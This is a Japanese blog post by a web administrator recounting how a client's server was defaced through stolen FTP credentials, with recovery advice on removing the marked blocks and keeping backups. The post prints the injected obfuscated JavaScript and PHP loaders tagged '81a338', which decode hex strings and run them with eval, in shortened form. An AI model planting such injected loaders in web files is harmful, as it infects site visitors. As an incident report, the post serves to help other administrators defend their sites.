WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

サブコンテンツ

危険な高額塾

タグ

掲示板 定型文 エクスプローラー 久積篤史 申請金ビジネス 出店料 エキスパートメール ブラウザ ウイルス Windows 7 アンダーグラウンドアフィリエイトクラブ PPC ツイッター バナー JavaScript 伊藤塾 土屋ひろし トレンドキーワード 蝶乃舞 メモ getElementById wp-login.php ファビコン ヤフー XHTML Internet Explorer インフォトップ 無断送信 リンクシェイカー 小笠原健一 自動化 ネットビジネス最後の楽園 Youtube ドメイン モザイク CGI 自動 インターネット 山下 explorer android 個人情報流出 秀吉塾天下統一 加藤 秀吉 アフィリエイト 特定のメールアドレス スマホ Newpost Catch ライオンアフィリエイト バイドゥー ヤフオク がら空きビジネス 池田純矢 新井浩 切り抜き アフィ匠 背景 フォローマティック サイト改ざん Windows ツール レタープレス google 株式会社A-ブログレス マイクロソフト ぼかし FireWorks バックアップ インペリアルゴールド 原田真 復元 ブラクラ DOCTYPE Chrome ネットショップ ECサイト document.all ムーバブルタイプ 人物 ping送信 ビジネス エディタ 放射線 BBIZ クラウド変換 副業術 Line ブロック SyntaxHighlighter iphone SKナレッジ 短縮URL クロスアフィリエイト 滑らか 宮田麗花 改ざん ライン KMSpico ユーチューブマニアクス2017 followmatic CS5 81a338 ソースコード MovableTYpe エクスチェンジ 与沢翼×蝶乃舞 インターネットビジネススクール wordpress アレックス式ネオせどりスクール ロリポップ RSS Includes Pages クリックランキング moza やしろひろたみ ブラシ Firefox 無料 html @PAGES アクセスアップ 石井匠 株式会社SRシステム アレックス 秒速で1億円稼ぐ男 Extension Manager クラウド入力機能 KMS認証 PHP カスタマイズ 転売大園塾 中山秀人 ランキング マニュアル 不労所得の神 ざくざく君 postpost 関根義光 ping Wordpress Content Slide やしろ塾 百度 特権ビジネス SEO 株式会社SRシステム プロモーション 加工 表示 コピーボタン 量産 .htaccess 伊藤虎太郎 ネオヒルズアカデミー 流出 与沢翼 system css High Concept Marketing YouTube Maniax 2017 マルウエア 短縮URLツール Google Maps API 管理画面 サンタ レンタルサーバー ネットゲーム FTP 音量アイコン 脆弱性 twitter 到達率 アンダーグラウンドメソッド IBS レビュー 高額塾 グラデーション 自己アフィリ 自己アフィリエイト WEB SmoothScroll.js タスクバー ウインドウ テーマ シャンプー ワードプレス 日本語入力変換ソフト 個人情報 球体 インターネットエクスプローラー スムーズ 北川 雅嗣 感染 EC 詐欺 株式会社WINGOOD クラック 上位表示 ネットガレージ 関根塾 株式会社ニュース 三橋美仁 LinkShaker 株式会社Free Agent Style functions.php 株式会社バンザイ プラグイン 大園転売塾 せどり Login LockDown 村上省吾 getElementByTagName tool 配布 登録禁止 Diamond Affiliate Masters Program トレンドアフィリエイト ソフト 大園麗花 大西良幸 ヤフーショッピング レイアウト メルマガ配信システム 伊藤 歩 DTD レイアウト崩れ ブルートフォースアタック ネットビジネス大全集 Tiger-Wing ハート Cash on Wordpress 伊藤 虎太郎 ライブチャット HTML4.0 トラフィック RMT 既得権益 Google Maps CS6 アイコン パズル フレンドシップメール 権利収入 セキュリティ Adobe ネットビジネス Yahoo Baidu IP プロファイル タイガーウイング 不正アクセス ソース アクセス制限 固定ページ ボタン Ban Hammer 画像 アドセンス BUYMA テンプレート 切抜き バイマ MT もざ Favicon ブロックポリシー office wpXサーバー 大園式転売塾 スタイルシート force puzzle 不正送信 IE 改竄 無料オファー Agency Business スカイプ 詐欺組織 管理ツール MasterCollection 立体 比較 Thunderbird 高速ゲーム スクロール WP デスクトップ 賢威 RSS 情報商材 優先順位

アーカイブ

エステトラブル

このページの先頭へ